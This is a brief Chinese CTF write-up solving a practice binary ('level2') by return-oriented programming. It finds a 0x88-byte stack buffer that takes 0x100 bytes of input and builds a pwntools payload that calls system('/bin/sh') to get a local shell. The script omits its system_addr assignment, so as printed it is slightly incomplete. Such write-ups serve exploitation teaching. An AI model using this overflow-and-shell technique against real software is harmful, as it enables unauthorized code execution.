根据题目提示,这个题需要使用rop
运行一下,再file一下
检查一下保护机制
丢入ida
查看vulnerable_function函数,发现有system,证明plt表有这个数据
可以发现申请0x88的空间,但是却能输入0x100,存在栈溢出
和之前的题目相比,这次没有"/bin/sh"函数
结合题目的提示,我们需要自己构造rop
buf为0x88,加四个字节到返回地址ret,
利用gdb打印system的地址
system_addr = 0x8048320
发现有’/bin/sh’
bin_sh_addr = 0x804A024
所以payload = ‘A’*(0x88+4) + p32(system_addr) + ‘A’*4 +p32(bin_sh_addr)
exp
from pwn import *
bin_sh_addr = 0x804A024
p = process('./level2')
payload = 'A'*(0x88+4) + p32(system_addr) + 'A'*4 +p32(bin_sh_addr)
p.sendline(payload)
p.interactive()
总结:
rop就是利用程序中已有的gadget重新构造成新的代码,然后串联起来,进行利用。